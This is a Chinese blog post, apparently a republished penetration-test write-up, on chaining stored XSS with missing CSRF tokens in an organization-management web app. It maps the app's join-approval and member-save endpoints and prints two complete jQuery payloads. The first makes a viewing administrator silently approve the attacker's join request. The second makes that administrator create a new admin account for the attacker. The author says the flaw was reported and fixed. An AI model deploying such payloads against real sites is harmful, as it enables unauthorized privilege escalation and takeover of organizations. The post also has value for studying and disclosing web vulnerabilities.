热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

记一次渗透测试中利用存储型XSS添加用户

拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个grou

0x00 简单查看

拿到目标后简单看了下,是一个类似员工管理的东西,用户可以创建group,其他用户可以搜索这个group然后申请加入

每个账号都可以注册组织,然后让别人加入,加入的用户有创建者、管理员、默认成员3个角色,管理员拥有的权限就比较大了,可以查看通讯录、添加成员、删除成员等等

0x01 申请加入组织流程分析

走了一遍流程,注册了两个账号,一个是reber,一个是yxk

在加入某组织时会让填验证信息,组织收到申请后同意然后把用户添加到某个分组然后确定

流程大概分4步,用户申请加入group、管理员点击同意、管理员关联用户到分组或成员、确定同意用户的申请

  • 用户reber搜索组织,然后提交验证消息 记一次渗透测试中利用存储型XSS添加用户

  • 用户yxk在消息列表同意reber的申请 记一次渗透测试中利用存储型XSS添加用户

  • yxk给reber分组,点击下一步

  • 最后一步写入备注信息,点击同意按钮最终同意用户加入 记一次渗透测试中利用存储型XSS添加用户

0x02 请求链接分析

经过对上面流程的抓包分析测试,涉及到的有用请求有3个:管理员点击同意链接时的请求、关联到分组或成员的请求、确定同意的请求

  • 用户申请加入某group时发送的数据包如下:
API:/a/cms/org/applyorg
POST:verification=11111&orgId=247173
  • group管理员同意用户申请时链接如下:
API:/a/cms/apply/handle-accept?id=6de027c0-9a4f-490e-a5e2-d1c76cd34a70&oid=247178&name=1760048****

这里链接里有一个id,经过抓包发现可以通过/a/cms/apply/applymsg这个接口直接得到同意申请时的链接

  • 将申请用户关联到分组或成员涉及到如下数据包:
API:/a/cms/apply/do.handle
POST:ID=80b49e8f-4e8c-450f-8bf4-eb809271e779&OID=247178&GID=608863&MID=0&Agree=true&Reason=111

可以看到,上面的请求链接中都没有token,存在CSRF,就猜想能不能构造上述请求从而通过XSS和CSRF来做一些事情

0x03 构造直接添加用户到group的js

由于COOKIE设置了httponly,不能获取到完整的COOKIE,所以这里尝试写js代码,实现将用户直接加入group的功能

看了上面的请求包分析后发现,如果要构造数据包实现我们的想法的话需要有:ID、OID、GID这3个id

分析后发现在/a/cms/apply/applymsg请求的返回包中有同意的链接,链接中有ID

分析后发现在/a/cms/group/treeNode请求的返回包中有OID和GID

于是用于XSS的1.js内容构造如下:

//因为这里要把ajax的返回值return到函数中,需要是同步请求,所以async要设为false

function get_agree_url(){//得到管理员同意用户申请的链接
    var agree_url;
    var href;
    $.ajax({
        type: 'get',
        url: '/a/cms/apply/applymsg',
        async: false,
        success: function(data){
            $(data).find('#accept').each(function(index,element){
                href = $(this).attr('href');
                if (/id=.*?name=1760048****/.test(href)){
                    agree_url = href;
                }
            });
        }
    });
    return agree_url;
}

function get_oid_gid(){//得到oid和gid
    var oid;
    $.ajax({
        type: 'post',
        url: '/a/cms/group/treeNode',
        dataType: 'json',
        async: false,
        data: 'parentId=0',
        success: function(data){
            oid = data[0]['dataObject']['orgId'];
            gid = data[0]['dataObject']['topGroupId'];
        }
    });
    return {
        'oid':oid,
        'gid':gid
    };
}

function attack(){
    var agree_url = get_agree_url();
    var id = /id=(.*?)&/.exec(agree_url)[1];
    var oid_gid = get_oid_gid();
    var oid = oid_gid['oid'];
    var gid = oid_gid['gid'];

    $.get(agree_url);//同意用户加入group

    var step2_url = '/a/cms/apply/handle-accept2?ID='+id+'&OID='+oid+'&Name=176004****'+'&GID='+gid+'&MID=0';
    $.get(step2_url);//关联到分组或成员

    $.post('/a/cms/apply/do.handle',{ID:id,OID:oid,GID:gid,MID:0,Agree:true,Reason:'111'});//最终确认同意,设置备注
}

attack();

0x04 进行XSS攻击添加用户

用户reber尝试加入yxk的组织并提交恶意代码: test 记一次渗透测试中利用存储型XSS添加用户

当用户yxk浏览用户申请列表页面时触发XSS 记一次渗透测试中利用存储型XSS添加用户

回到reber用户,可以看到已经加入了yxk的组织,可以进行一些操作了 记一次渗透测试中利用存储型XSS添加用户

0x05 更进一步,添加为管理员

刚开始分析发现通过上面的过程先添加用户,然后再添加用户为管理员,比较麻烦

后续发现其实不用这么麻烦,直接用另外一个接口发送ajax请求就能直接添加管理员用户

添加管理员的2.js如下:

function get_gid(){
    $.ajax({
        type: 'post',
        url: '/a/cms/group/treeNode',
        dataType: 'json',
        async: false,
        data: 'parentId=0',
        success: function(data){
            gid = data[0]['dataObject']['topGroupId'];
        }
    });
    return gid;
}

var gid = get_gid();

$.post('/a/cms/member/do.save',{memberId: 0,userId: '',mobile: '176004****',name: 'aaa',pinyin: 'aaa',groupId: 608863,group: '默认分组',roleId: 2,duty: '',sex: 0,sort: '10000','TEL;CELL': '','TEL;WORK': '',EMAIL: ''});

提交验证信息为: test

当yxk访问请求的list页面时即可直接添加新用户aaa到group并且是管理员账户: 记一次渗透测试中利用存储型XSS添加用户

好了,打完收工!

PS:漏洞已提交,并早在3个月前修复


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 我们


推荐阅读
  • 本文介绍了如何使用JSONObiect和Gson相关方法实现json数据与kotlin对象的相互转换。首先解释了JSON的概念和数据格式,然后详细介绍了相关API,包括JSONObject和Gson的使用方法。接着讲解了如何将json格式的字符串转换为kotlin对象或List,以及如何将kotlin对象转换为json字符串。最后提到了使用Map封装json对象的特殊情况。文章还对JSON和XML进行了比较,指出了JSON的优势和缺点。 ... [详细]
  • 本文介绍了闭包的定义和运转机制,重点解释了闭包如何能够接触外部函数的作用域中的变量。通过词法作用域的查找规则,闭包可以访问外部函数的作用域。同时还提到了闭包的作用和影响。 ... [详细]
  • 开发笔记:加密&json&StringIO模块&BytesIO模块
    篇首语:本文由编程笔记#小编为大家整理,主要介绍了加密&json&StringIO模块&BytesIO模块相关的知识,希望对你有一定的参考价值。一、加密加密 ... [详细]
  • 如何使用Java获取服务器硬件信息和磁盘负载率
    本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务,并获取服务器的磁盘信息,并将结果输出。然后在本地使用JS编写一个AJAX脚本,远程请求服务端的程序,得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]
  • Voicewo在线语音识别转换jQuery插件的特点和示例
    本文介绍了一款名为Voicewo的在线语音识别转换jQuery插件,该插件具有快速、架构、风格、扩展和兼容等特点,适合在互联网应用中使用。同时还提供了一个快速示例供开发人员参考。 ... [详细]
  • 不同优化算法的比较分析及实验验证
    本文介绍了神经网络优化中常用的优化方法,包括学习率调整和梯度估计修正,并通过实验验证了不同优化算法的效果。实验结果表明,Adam算法在综合考虑学习率调整和梯度估计修正方面表现较好。该研究对于优化神经网络的训练过程具有指导意义。 ... [详细]
  • 利用Visual Basic开发SAP接口程序初探的方法与原理
    本文介绍了利用Visual Basic开发SAP接口程序的方法与原理,以及SAP R/3系统的特点和二次开发平台ABAP的使用。通过程序接口自动读取SAP R/3的数据表或视图,在外部进行处理和利用水晶报表等工具生成符合中国人习惯的报表样式。具体介绍了RFC调用的原理和模型,并强调本文主要不讨论SAP R/3函数的开发,而是针对使用SAP的公司的非ABAP开发人员提供了初步的接口程序开发指导。 ... [详细]
  • 本文讨论了在openwrt-17.01版本中,mt7628设备上初始化启动时eth0的mac地址总是随机生成的问题。每次随机生成的eth0的mac地址都会写到/sys/class/net/eth0/address目录下,而openwrt-17.01原版的SDK会根据随机生成的eth0的mac地址再生成eth0.1、eth0.2等,生成后的mac地址会保存在/etc/config/network下。 ... [详细]
  • 本文分享了一个关于在C#中使用异步代码的问题,作者在控制台中运行时代码正常工作,但在Windows窗体中却无法正常工作。作者尝试搜索局域网上的主机,但在窗体中计数器没有减少。文章提供了相关的代码和解决思路。 ... [详细]
  • 目录实现效果:实现环境实现方法一:基本思路主要代码JavaScript代码总结方法二主要代码总结方法三基本思路主要代码JavaScriptHTML总结实 ... [详细]
  • 本文介绍了C#中生成随机数的三种方法,并分析了其中存在的问题。首先介绍了使用Random类生成随机数的默认方法,但在高并发情况下可能会出现重复的情况。接着通过循环生成了一系列随机数,进一步突显了这个问题。文章指出,随机数生成在任何编程语言中都是必备的功能,但Random类生成的随机数并不可靠。最后,提出了需要寻找其他可靠的随机数生成方法的建议。 ... [详细]
  • 本文介绍了Redis的基础数据结构string的应用场景,并以面试的形式进行问答讲解,帮助读者更好地理解和应用Redis。同时,描述了一位面试者的心理状态和面试官的行为。 ... [详细]
  • 使用在线工具jsonschema2pojo根据json生成java对象
    本文介绍了使用在线工具jsonschema2pojo根据json生成java对象的方法。通过该工具,用户只需将json字符串复制到输入框中,即可自动将其转换成java对象。该工具还能解析列表式的json数据,并将嵌套在内层的对象也解析出来。本文以请求github的api为例,展示了使用该工具的步骤和效果。 ... [详细]
  • 本文介绍了前端人员必须知道的三个问题,即前端都做哪些事、前端都需要哪些技术,以及前端的发展阶段。初级阶段包括HTML、CSS、JavaScript和jQuery的基础知识。进阶阶段涵盖了面向对象编程、响应式设计、Ajax、HTML5等新兴技术。高级阶段包括架构基础、模块化开发、预编译和前沿规范等内容。此外,还介绍了一些后端服务,如Node.js。 ... [详细]
  • 如何查询zone下的表的信息
    本文介绍了如何通过TcaplusDB知识库查询zone下的表的信息。包括请求地址、GET请求参数说明、返回参数说明等内容。通过curl方法发起请求,并提供了请求示例。 ... [详细]
author-avatar
乌桥老鹅
这个家伙很懒,什么也没留下!
RankList | 热门文章